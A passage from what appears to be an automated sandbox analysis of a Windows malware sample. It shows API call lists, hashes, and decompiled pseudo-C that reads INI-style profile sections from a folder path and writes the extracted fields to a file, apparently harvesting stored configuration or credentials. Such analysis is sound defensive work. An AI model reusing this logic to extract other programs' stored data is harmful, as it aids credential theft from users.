                                                                                                                                • Part of subcall function 004082E1: DeleteCriticalSection.KERNEL32(FFFFFFFF,77E4F3A0,?,0040870A,?,00407098), ref: 0040B156
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004085BE
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004085CB
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004085D8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004085E5
                                                                                                                              • TlsAlloc.KERNEL32(?,00407098), ref: 00408635
                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,00407098), ref: 00408650
                                                                                                                              • __init_pointers.LIBCMT ref: 0040865A
                                                                                                                              • EncodePointer.KERNEL32(?,00407098), ref: 0040866B
                                                                                                                              • EncodePointer.KERNEL32(?,00407098), ref: 00408678
                                                                                                                              • EncodePointer.KERNEL32(?,00407098), ref: 00408685
                                                                                                                              • EncodePointer.KERNEL32(?,00407098), ref: 00408692
                                                                                                                              • DecodePointer.KERNEL32(00408465,?,00407098), ref: 004086B3
                                                                                                                              • __calloc_crt.LIBCMT ref: 004086C8
                                                                                                                              • DecodePointer.KERNEL32(00000000,?,00407098), ref: 004086E2
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004086F4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                              • API String ID: 3698121176-3819984048
                                                                                                                              • Opcode ID: e859809d022cf060a4734246ee46259a085ef568b49adb2bc0e7320be927cf26
                                                                                                                              • Instruction ID: 2ba049c44f2d370ad7b90371e198975f95760fcba2a476707755bf87411b7394
                                                                                                                              • Opcode Fuzzy Hash: e859809d022cf060a4734246ee46259a085ef568b49adb2bc0e7320be927cf26
                                                                                                                              • Instruction Fuzzy Hash: D3319A35A04211DBCB21AFB5BE09A163BA4AB60728B24553FE444A32F1EF788445CF5E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041CDE0, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 300COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 59%
                                                                                                                              			E0041CDE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				CHAR* _v8;
				signed int _v12;
				char _v4372;
				char _v4636;
				intOrPtr _v4640;
				intOrPtr _v4644;
				intOrPtr _v4648;
				char* _v4652;
				intOrPtr _v4656;
				intOrPtr _v4660;
				char _v4664;
				char _v4668;
				intOrPtr _v4672;
				intOrPtr _v4676;
				intOrPtr* _v4680;
				intOrPtr _v4684;
				char _v4685;
				intOrPtr _v4692;
				intOrPtr* _v4696;
				intOrPtr _v4700;
				char _v4701;
				intOrPtr _v4708;
				intOrPtr* _v4712;
				intOrPtr _v4716;
				char _v4717;
				intOrPtr _v4724;
				void* __ebp;
				signed int _t114;
				intOrPtr _t122;
				intOrPtr _t126;
				intOrPtr _t136;
				intOrPtr _t137;
				intOrPtr _t139;
				intOrPtr* _t142;
				intOrPtr _t148;
				void* _t162;
				intOrPtr _t163;
				intOrPtr _t172;
				intOrPtr _t188;
				intOrPtr _t193;
				intOrPtr _t201;
				intOrPtr _t205;
				intOrPtr _t208;
				intOrPtr* _t209;
				intOrPtr _t213;
				intOrPtr _t216;
				intOrPtr _t218;
				intOrPtr _t223;
				intOrPtr _t227;
				intOrPtr* _t228;
				intOrPtr _t241;
				signed int _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t252;
				void* _t258;
				void* _t260;
				void* _t267;
				void* _t272;

				_t245 = __esi;
				_t244 = __edi;
				_t182 = __ebx;
				E00412A40(0x1270);
				_t114 =  *0x4301f4; // 0xe687535
				_v12 = _t114 ^ _t246;
				 *0x432868(0, 0x1a, 0, 0,  &_v4636);
				_t216 =  *0x4324c4; // 0x2336c68
				E00406125(_t216, _a12, 4, _t216,  &_v4636);
				_t217 =  &_v4372;
				GetPrivateProfileSectionNamesA( &_v4372, 0x1000, _a12);
				_v8 =  &_v4372;
				_t122 =  *0x432738(_a12);
				_t249 = _t247 + 0x14;
				if(_t122 == 0) {
					_push(0x43270c);
					_t122 = E0040611A();
					_t250 = _t249 + 4;
					_v4640 = _t122;
					if(_v4640 < 0x20) {
						_push(0);
						_t218 =  *0x4326f0; // 0x2336b60
						_v4648 = E0041A3B0(_a12, _t218);
						_v4668 = 0;
						_v4664 = 0;
						_t188 =  *0x43264c; // 0x2336740
						_t217 = _v4648;
						_t126 = E004055AB(_v4648, _t188);
						_t252 = _t250 + 0x14;
						_v4660 = _t126;
						_t279 = _v4660;
						if(_v4660 != 0) {
							_push(2);
							_push(0);
							_push(_v4660);
							E004066BB(__ebx, _t217, __edi, __esi, _t279);
							_push(_v4660);
							_v4668 = E004065CC(__ebx, __edi, __esi, _t279);
							_push(0);
							E004066BB(__ebx, _v4660, __edi, __esi, _t279);
							_v4676 = E00404349(_t244, _t245, _t279, _v4668 + 1, _v4660, 0);
							_v4644 = _v4676;
							E0040641B(_v4644, 1, _v4668, _v4660);
							_t217 =  *0x432188; // 0x23366d0
							_t136 =  *0x4325d0; // 0x23369c8
							_t137 = E004055AB(_t136, _t217);
							_t258 = _t252 + 0x38;
							_v4672 = _t137;
							if(_v4672 != 0) {
								while(1) {
									_t193 =  *0x4321b0; // 0x2336ae8
									_t217 = _v4644;
									_t139 = E00402D10(_v4644, _t193);
									_t260 = _t258 + 8;
									_v4656 = _t139;
									if(_v4656 == 0) {
										break;
									}
									_t142 =  *0x4321b0; // 0x2336ae8
									_v4680 = _t142;
									_v4684 = _v4680 + 1;
									do {
										_v4685 =  *_v4680;
										_v4680 = _v4680 + 1;
										_t283 = _v4685;
									} while (_v4685 != 0);
									_v4692 = _v4680 - _v4684;
									_t49 = _v4692 + 3; // 0x3
									_v4656 = _v4656 + _t49;
									_t223 =  *0x432394; // 0x2336950
									_v4652 = E00402D10(_v4656, _t223) - 3;
									 *_v4652 = 0;
									_push(_a4);
									_t148 =  *0x43239c; // 0x2336b00
									_push(_t148);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push(_a8);
									_t201 =  *0x4323b8; // 0x2336b48
									_push(_t201);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push(_v4656);
									_t227 =  *0x432258; // 0x2336a10
									_push(_t227);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_t267 = _t260 + 0x44;
									_t228 =  *0x432548; // 0x2336090
									_v4696 = _t228;
									_v4700 = _v4696 + 1;
									do {
										_v4701 =  *_v4696;
										_v4696 = _v4696 + 1;
										_t285 = _v4701;
									} while (_v4701 != 0);
									_v4708 = _v4696 - _v4700;
									_t205 =  *0x432548; // 0x2336090
									_t162 = E00402D10(_v4652 + 1, _t205);
									_t77 = _v4708 + 3; // 0x3
									_v4656 = _t162 + _t77;
									_t163 =  *0x432544; // 0x2335f70
									_v4652 = E00402D10(_v4656, _t163) - 3;
									 *_v4652 = 0;
									_push(E0041C900(_t182, _t244, _t245, _v4656));
									_t208 =  *0x4322b4; // 0x2336938
									_push(_t208);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t285);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t285);
									_t272 = _t267 + 0x28;
									_t209 =  *0x432544; // 0x2335f70
									_v4712 = _t209;
									_v4716 = _v4712 + 1;
									do {
										_v4717 =  *_v4712;
										_v4712 = _v4712 + 1;
										_t287 = _v4717;
									} while (_v4717 != 0);
									_v4724 = _v4712 - _v4716;
									_t172 =  *0x432544; // 0x2335f70
									_v4656 = E00402D10(_v4652 + 1, _t172) + _v4724 + 3;
									_t213 =  *0x432664; // 0x23366e0
									_v4652 = E00402D10(_v4656, _t213) - 3;
									 *_v4652 = 0;
									_push(E0041C900(_t182, _t244, _t245, _v4656));
									_t241 =  *0x4326c4; // 0x2336a28
									_push(_t241);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t287);
									_push("\n\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t287);
									_t258 = _t272 + 0x28;
									_v4644 = _v4652 + 1;
								}
								_push(_v4672);
								E00405EA3(_t182, _t217, _t244, _t245, __eflags);
								_t258 = _t260 + 4;
							}
							_push(_v4660);
							E00405EA3(_t182, _t217, _t244, _t245, __eflags);
						}
						_t122 =  *0x432764();
					}
				}
				__eflags = _v12 ^ _t246;
				return E00404354(_t122, _t182, _v12 ^ _t246, _t217, _t244, _t245);
			}































































                                                                                                                              0x0041cde0
                                                                                                                              0x0041cde0
                                                                                                                              0x0041cde0
                                                                                                                              0x0041cde8
                                                                                                                              0x0041cded
                                                                                                                              0x0041cdf4
                                                                                                                              0x0041ce06
                                                                                                                              0x0041ce13
                                                                                                                              0x0041ce20
                                                                                                                              0x0041ce31
                                                                                                                              0x0041ce38
                                                                                                                              0x0041ce44
                                                                                                                              0x0041ce4b
                                                                                                                              0x0041ce51
                                                                                                                              0x0041ce56
                                                                                                                              0x0041ce5c
                                                                                                                              0x0041ce61
                                                                                                                              0x0041ce66
                                                                                                                              0x0041ce69
                                                                                                                              0x0041ce76
                                                                                                                              0x0041ce7c
                                                                                                                              0x0041ce7e
                                                                                                                              0x0041ce91
                                                                                                                              0x0041ce97
                                                                                                                              0x0041cea1
                                                                                                                              0x0041ceab
                                                                                                                              0x0041ceb2
                                                                                                                              0x0041ceb9
                                                                                                                              0x0041cebe
                                                                                                                              0x0041cec1
                                                                                                                              0x0041cec7
                                                                                                                              0x0041cece
                                                                                                                              0x0041ced4
                                                                                                                              0x0041ced6
                                                                                                                              0x0041cede
                                                                                                                              0x0041cedf
                                                                                                                              0x0041ceed
                                                                                                                              0x0041cef6
                                                                                                                              0x0041cefc
                                                                                                                              0x0041cf07
                                                                                                                              0x0041cf21
                                                                                                                              0x0041cf2d
                                                                                                                              0x0041cf4a
                                                                                                                              0x0041cf52
                                                                                                                              0x0041cf59
                                                                                                                              0x0041cf5f
                                                                                                                              0x0041cf64
                                                                                                                              0x0041cf67
                                                                                                                              0x0041cf74
                                                                                                                              0x0041cf7a
                                                                                                                              0x0041cf7a
                                                                                                                              0x0041cf81
                                                                                                                              0x0041cf88
                                                                                                                              0x0041cf8d
                                                                                                                              0x0041cf90
                                                                                                                              0x0041cf9d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041cfa3
                                                                                                                              0x0041cfa8
                                                                                                                              0x0041cfb7
                                                                                                                              0x0041cfbd
                                                                                                                              0x0041cfc5
                                                                                                                              0x0041cfcb
                                                                                                                              0x0041cfd2
                                                                                                                              0x0041cfd2
                                                                                                                              0x0041cfe7
                                                                                                                              0x0041cff9
                                                                                                                              0x0041cffd
                                                                                                                              0x0041d003
                                                                                                                              0x0041d01c
                                                                                                                              0x0041d028
                                                                                                                              0x0041d02e
                                                                                                                              0x0041d02f
                                                                                                                              0x0041d034
                                                                                                                              0x0041d03b
                                                                                                                              0x0041d03c
                                                                                                                              0x0041d044
                                                                                                                              0x0041d04f
                                                                                                                              0x0041d050
                                                                                                                              0x0041d05b
                                                                                                                              0x0041d05c
                                                                                                                              0x0041d062
                                                                                                                              0x0041d069
                                                                                                                              0x0041d06a
                                                                                                                              0x0041d072
                                                                                                                              0x0041d07d
                                                                                                                              0x0041d07e
                                                                                                                              0x0041d08c
                                                                                                                              0x0041d08d
                                                                                                                              0x0041d093
                                                                                                                              0x0041d09a
                                                                                                                              0x0041d09b
                                                                                                                              0x0041d0a3
                                                                                                                              0x0041d0ae
                                                                                                                              0x0041d0af
                                                                                                                              0x0041d0b4
                                                                                                                              0x0041d0b7
                                                                                                                              0x0041d0bd
                                                                                                                              0x0041d0cc
                                                                                                                              0x0041d0d2
                                                                                                                              0x0041d0da
                                                                                                                              0x0041d0e0
                                                                                                                              0x0041d0e7
                                                                                                                              0x0041d0e7
                                                                                                                              0x0041d0fc
                                                                                                                              0x0041d102
                                                                                                                              0x0041d113
                                                                                                                              0x0041d121
                                                                                                                              0x0041d125
                                                                                                                              0x0041d12b
                                                                                                                              0x0041d143
                                                                                                                              0x0041d14f
                                                                                                                              0x0041d161
                                                                                                                              0x0041d162
                                                                                                                              0x0041d168
                                                                                                                              0x0041d16f
                                                                                                                              0x0041d170
                                                                                                                              0x0041d178
                                                                                                                              0x0041d183
                                                                                                                              0x0041d184
                                                                                                                              0x0041d189
                                                                                                                              0x0041d18c
                                                                                                                              0x0041d192
                                                                                                                              0x0041d1a1
                                                                                                                              0x0041d1a7
                                                                                                                              0x0041d1af
                                                                                                                              0x0041d1b5
                                                                                                                              0x0041d1bc
                                                                                                                              0x0041d1bc
                                                                                                                              0x0041d1d1
                                                                                                                              0x0041d1d7
                                                                                                                              0x0041d1f9
                                                                                                                              0x0041d1ff
                                                                                                                              0x0041d218
                                                                                                                              0x0041d224
                                                                                                                              0x0041d236
                                                                                                                              0x0041d237
                                                                                                                              0x0041d23d
                                                                                                                              0x0041d244
                                                                                                                              0x0041d245
                                                                                                                              0x0041d24d
                                                                                                                              0x0041d258
                                                                                                                              0x0041d259
                                                                                                                              0x0041d25e
                                                                                                                              0x0041d26a
                                                                                                                              0x0041d26a
                                                                                                                              0x0041d27b
                                                                                                                              0x0041d27c
                                                                                                                              0x0041d281
                                                                                                                              0x0041d281
                                                                                                                              0x0041d28a
                                                                                                                              0x0041d28b
                                                                                                                              0x0041d290
                                                                                                                              0x0041d293
                                                                                                                              0x0041d293
                                                                                                                              0x0041ce76
                                                                                                                              0x0041d29c
                                                                                                                              0x0041d2a6

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fprintf$_fseek$FolderNamesPathPrivateProfileSection__fread_nolock__fseek_nolock__fsopen__lock_file__snprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 964051248-3916222277
                                                                                                                              • Opcode ID: b0134b1bbbc47938beea79b5c8d69063b089505a3bd519f0597257b1a0dd5c9e
                                                                                                                              • Instruction ID: 8bb85de0f22b289aae1df3d9185be0b70f7552bc5c52eba9c7a08788fcfb9ccc
                                                                                                                              • Opcode Fuzzy Hash: b0134b1bbbc47938beea79b5c8d69063b089505a3bd519f0597257b1a0dd5c9e
                                                                                                                              • Instruction Fuzzy Hash: 87D171B5E00218AFCB24EF64DD81ADEB7B5AB48304F0441E9E509E7391D7789EA4CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041CDE0, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 300COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 51%
                                                                                                                              			E0041CDE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _v8;
				signed int _v12;
				char _v4372;
				char _v4636;
				intOrPtr _v4640;
				intOrPtr _v4644;
				intOrPtr _v4648;
				char* _v4652;
				intOrPtr _v4656;
				intOrPtr _v4660;
				char _v4664;
				char _v4668;
				intOrPtr _v4672;
				intOrPtr _v4676;
				intOrPtr* _v4680;
				intOrPtr _v4684;
				char _v4685;
				intOrPtr _v4692;
				intOrPtr* _v4696;
				intOrPtr _v4700;
				char _v4701;
				intOrPtr _v4708;
				intOrPtr* _v4712;
				intOrPtr _v4716;
				char _v4717;
				intOrPtr _v4724;
				void* __ebp;
				signed int _t114;
				intOrPtr _t122;
				intOrPtr _t126;
				intOrPtr _t137;
				intOrPtr _t139;
				void* _t162;
				signed int _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t252;
				void* _t258;
				void* _t260;
				void* _t267;
				void* _t272;

				_t245 = __esi;
				_t244 = __edi;
				_t182 = __ebx;
				E00412A40(0x1270);
				_t114 =  *0x4301f4; // 0xe687535
				_v12 = _t114 ^ _t246;
				 *0x432868(0, 0x1a, 0, 0,  &_v4636);
				E00406125( *0x4324c4, _a12, 4,  *0x4324c4,  &_v4636);
				_t217 =  &_v4372;
				 *0x432770( &_v4372, 0x1000, _a12);
				_v8 =  &_v4372;
				_t122 =  *0x432738(_a12);
				_t249 = _t247 + 0x14;
				if(_t122 == 0) {
					_push(0x43270c);
					_t122 = E0040611A();
					_t250 = _t249 + 4;
					_v4640 = _t122;
					if(_v4640 < 0x20) {
						_push(0);
						_v4648 = E0041A3B0(_a12,  *0x4326f0);
						_v4668 = 0;
						_v4664 = 0;
						_t217 = _v4648;
						_t126 = E004055AB(_v4648,  *0x43264c);
						_t252 = _t250 + 0x14;
						_v4660 = _t126;
						_t279 = _v4660;
						if(_v4660 != 0) {
							_push(2);
							_push(0);
							_push(_v4660);
							E004066BB(__ebx, _t217, __edi, __esi, _t279);
							_push(_v4660);
							_v4668 = E004065CC(__ebx, __edi, __esi, _t279);
							_push(0);
							E004066BB(__ebx, _v4660, __edi, __esi, _t279);
							_v4676 = E00404349(_t244, _t245, _t279, _v4668 + 1, _v4660, 0);
							_v4644 = _v4676;
							E0040641B(_v4644, 1, _v4668, _v4660);
							_t217 =  *0x432188;
							_t137 = E004055AB( *0x4325d0,  *0x432188);
							_t258 = _t252 + 0x38;
							_v4672 = _t137;
							if(_v4672 != 0) {
								while(1) {
									_t217 = _v4644;
									_t139 = E00402D10(_v4644,  *0x4321b0);
									_t260 = _t258 + 8;
									_v4656 = _t139;
									if(_v4656 == 0) {
										break;
									}
									_v4680 =  *0x4321b0;
									_v4684 = _v4680 + 1;
									do {
										_v4685 =  *_v4680;
										_v4680 = _v4680 + 1;
										_t283 = _v4685;
									} while (_v4685 != 0);
									_v4692 = _v4680 - _v4684;
									_t49 = _v4692 + 3; // 0x3
									_v4656 = _v4656 + _t49;
									_v4652 = E00402D10(_v4656,  *0x432394) - 3;
									 *_v4652 = 0;
									_push(_a4);
									_push( *0x43239c);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push(_a8);
									_push( *0x4323b8);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push(_v4656);
									_push( *0x432258);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t283);
									_t267 = _t260 + 0x44;
									_v4696 =  *0x432548;
									_v4700 = _v4696 + 1;
									do {
										_v4701 =  *_v4696;
										_v4696 = _v4696 + 1;
										_t285 = _v4701;
									} while (_v4701 != 0);
									_v4708 = _v4696 - _v4700;
									_t162 = E00402D10(_v4652 + 1,  *0x432548);
									_t77 = _v4708 + 3; // 0x3
									_v4656 = _t162 + _t77;
									_v4652 = E00402D10(_v4656,  *0x432544) - 3;
									 *_v4652 = 0;
									_push(E0041C900(_t182, _t244, _t245, _v4656));
									_push( *0x4322b4);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t285);
									_push("\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t285);
									_t272 = _t267 + 0x28;
									_v4712 =  *0x432544;
									_v4716 = _v4712 + 1;
									do {
										_v4717 =  *_v4712;
										_v4712 = _v4712 + 1;
										_t287 = _v4717;
									} while (_v4717 != 0);
									_v4724 = _v4712 - _v4716;
									_v4656 = E00402D10(_v4652 + 1,  *0x432544) + _v4724 + 3;
									_v4652 = E00402D10(_v4656,  *0x432664) - 3;
									 *_v4652 = 0;
									_push(E0041C900(_t182, _t244, _t245, _v4656));
									_push( *0x4326c4);
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t287);
									_push("\n\n");
									_push(_v4672);
									E004055C2(_t182, _t244, _t245, _t287);
									_t258 = _t272 + 0x28;
									_v4644 = _v4652 + 1;
								}
								_push(_v4672);
								E00405EA3(_t182, _t217, _t244, _t245, __eflags);
								_t258 = _t260 + 4;
							}
							_push(_v4660);
							E00405EA3(_t182, _t217, _t244, _t245, __eflags);
						}
						_t122 =  *0x432764();
					}
				}
				__eflags = _v12 ^ _t246;
				return E00404354(_t122, _t182, _v12 ^ _t246, _t217, _t244, _t245);
			}













































                                                                                                                              0x0041cde0
                                                                                                                              0x0041cde0
                                                                                                                              0x0041cde0
                                                                                                                              0x0041cde8
                                                                                                                              0x0041cded
                                                                                                                              0x0041cdf4
                                                                                                                              0x0041ce06
                                                                                                                              0x0041ce20
                                                                                                                              0x0041ce31
                                                                                                                              0x0041ce38
                                                                                                                              0x0041ce44
                                                                                                                              0x0041ce4b
                                                                                                                              0x0041ce51
                                                                                                                              0x0041ce56
                                                                                                                              0x0041ce5c
                                                                                                                              0x0041ce61
                                                                                                                              0x0041ce66
                                                                                                                              0x0041ce69
                                                                                                                              0x0041ce76
                                                                                                                              0x0041ce7c
                                                                                                                              0x0041ce91
                                                                                                                              0x0041ce97
                                                                                                                              0x0041cea1
                                                                                                                              0x0041ceb2
                                                                                                                              0x0041ceb9
                                                                                                                              0x0041cebe
                                                                                                                              0x0041cec1
                                                                                                                              0x0041cec7
                                                                                                                              0x0041cece
                                                                                                                              0x0041ced4
                                                                                                                              0x0041ced6
                                                                                                                              0x0041cede
                                                                                                                              0x0041cedf
                                                                                                                              0x0041ceed
                                                                                                                              0x0041cef6
                                                                                                                              0x0041cefc
                                                                                                                              0x0041cf07
                                                                                                                              0x0041cf21
                                                                                                                              0x0041cf2d
                                                                                                                              0x0041cf4a
                                                                                                                              0x0041cf52
                                                                                                                              0x0041cf5f
                                                                                                                              0x0041cf64
                                                                                                                              0x0041cf67
                                                                                                                              0x0041cf74
                                                                                                                              0x0041cf7a
                                                                                                                              0x0041cf81
                                                                                                                              0x0041cf88
                                                                                                                              0x0041cf8d
                                                                                                                              0x0041cf90
                                                                                                                              0x0041cf9d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041cfa8
                                                                                                                              0x0041cfb7
                                                                                                                              0x0041cfbd
                                                                                                                              0x0041cfc5
                                                                                                                              0x0041cfcb
                                                                                                                              0x0041cfd2
                                                                                                                              0x0041cfd2
                                                                                                                              0x0041cfe7
                                                                                                                              0x0041cff9
                                                                                                                              0x0041cffd
                                                                                                                              0x0041d01c
                                                                                                                              0x0041d028
                                                                                                                              0x0041d02e
                                                                                                                              0x0041d034
                                                                                                                              0x0041d03b
                                                                                                                              0x0041d03c
                                                                                                                              0x0041d044
                                                                                                                              0x0041d04f
                                                                                                                              0x0041d050
                                                                                                                              0x0041d05b
                                                                                                                              0x0041d062
                                                                                                                              0x0041d069
                                                                                                                              0x0041d06a
                                                                                                                              0x0041d072
                                                                                                                              0x0041d07d
                                                                                                                              0x0041d07e
                                                                                                                              0x0041d08c
                                                                                                                              0x0041d093
                                                                                                                              0x0041d09a
                                                                                                                              0x0041d09b
                                                                                                                              0x0041d0a3
                                                                                                                              0x0041d0ae
                                                                                                                              0x0041d0af
                                                                                                                              0x0041d0b4
                                                                                                                              0x0041d0bd
                                                                                                                              0x0041d0cc
                                                                                                                              0x0041d0d2
                                                                                                                              0x0041d0da
                                                                                                                              0x0041d0e0
                                                                                                                              0x0041d0e7
                                                                                                                              0x0041d0e7
                                                                                                                              0x0041d0fc
                                                                                                                              0x0041d113
                                                                                                                              0x0041d121
                                                                                                                              0x0041d125
                                                                                                                              0x0041d143
                                                                                                                              0x0041d14f
                                                                                                                              0x0041d161
                                                                                                                              0x0041d168
                                                                                                                              0x0041d16f
                                                                                                                              0x0041d170
                                                                                                                              0x0041d178
                                                                                                                              0x0041d183
                                                                                                                              0x0041d184
                                                                                                                              0x0041d189
                                                                                                                              0x0041d192
                                                                                                                              0x0041d1a1
                                                                                                                              0x0041d1a7
                                                                                                                              0x0041d1af
                                                                                                                              0x0041d1b5
                                                                                                                              0x0041d1bc
                                                                                                                              0x0041d1bc
                                                                                                                              0x0041d1d1
                                                                                                                              0x0041d1f9
                                                                                                                              0x0041d218
                                                                                                                              0x0041d224
                                                                                                                              0x0041d236
                                                                                                                              0x0041d23d
                                                                                                                              0x0041d244
                                                                                                                              0x0041d245
                                                                                                                              0x0041d24d
                                                                                                                              0x0041d258
                                                                                                                              0x0041d259
                                                                                                                              0x0041d25e
                                                                                                                              0x0041d26a
                                                                                                                              0x0041d26a
                                                                                                                              0x0041d27b
                                                                                                                              0x0041d27c
                                                                                                                              0x0041d281
                                                                                                                              0x0041d281
                                                                                                                              0x0041d28a
                                                                                                                              0x0041d28b
                                                                                                                              0x0041d290
                                                                                                                              0x0041d293
                                                                                                                              0x0041d293
                                                                                                                              0x0041ce76
                                                                                                                              0x0041d29c
                                                                                                                              0x0041d2a6

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _fprintf$_fseek$__fread_nolock__fseek_nolock__fsopen__lock_file__snprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3078609872-3916222277
                                                                                                                              • Opcode ID: b0134b1bbbc47938beea79b5c8d69063b089505a3bd519f0597257b1a0dd5c9e
                                                                                                                              • Instruction ID: 8bb85de0f22b289aae1df3d9185be0b70f7552bc5c52eba9c7a08788fcfb9ccc
                                                                                                                              • Opcode Fuzzy Hash: b0134b1bbbc47938beea79b5c8d69063b089505a3bd519f0597257b1a0dd5c9e
                                                                                                                              • Instruction Fuzzy Hash: 87D171B5E00218AFCB24EF64DD81ADEB7B5AB48304F0441E9E509E7391D7789EA4CF58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041C0CA, Relevance: 19.6, APIs: 13, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000100,00000000,00000000), ref: 0041C140
                                                                                                                              • _fprintf.LIBCMT ref: 0041C154
                                                                                                                              • _fprintf.LIBCMT ref: 0041C168
                                                                                                                                • Part of subcall function 004055C2: __lock_file.LIBCMT ref: 00405609
                                                                                                                                • Part of subcall function 004055C2: __stbuf.LIBCMT ref: 0040568D
                                                                                                                                • Part of subcall function 004055C2: __output_l.LIBCMT ref: 0040569D
                                                                                                                                • Part of subcall function 004055C2: __ftbuf.LIBCMT ref: 004056A7
                                                                                                                              • _fprintf.LIBCMT ref: 0041C185
                                                                                                                              • _fprintf.LIBCMT ref: 0041C199
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C1C4
                                                                                                                              • _fprintf.LIBCMT ref: 0041C1DE
                                                                                                                              • _fprintf.LIBCMT ref: 0041C1F2
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C21D
                                                                                                                              • _fprintf.LIBCMT ref: 0041C238
                                                                                                                              • _fprintf.LIBCMT ref: 0041C24C
                                                                                                                              • _fprintf.LIBCMT ref: 0041C2A7
                                                                                                                              • _fprintf.LIBCMT ref: 0041C2BB
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C2F4
                                                                                                                              • _fprintf.LIBCMT ref: 0041C30F
                                                                                                                              • _fprintf.LIBCMT ref: 0041C323
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000100,00000000,00000000), ref: 0041C389
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000100,00000000,00000000), ref: 0041C407
                                                                                                                              • _fprintf.LIBCMT ref: 0041C41A
                                                                                                                              • _fprintf.LIBCMT ref: 0041C42E
                                                                                                                              • _fprintf.LIBCMT ref: 0041C44B
                                                                                                                              • _fprintf.LIBCMT ref: 0041C45F
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C48A
                                                                                                                              • _fprintf.LIBCMT ref: 0041C4A5
                                                                                                                              • _fprintf.LIBCMT ref: 0041C4B9
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041C4E4
                                                                                                                              • _fprintf.LIBCMT ref: 0041C4FE
                                                                                                                              • _fprintf.LIBCMT ref: 0041C512
                                                                                                                              • _fprintf.LIBCMT ref: 0041C56B
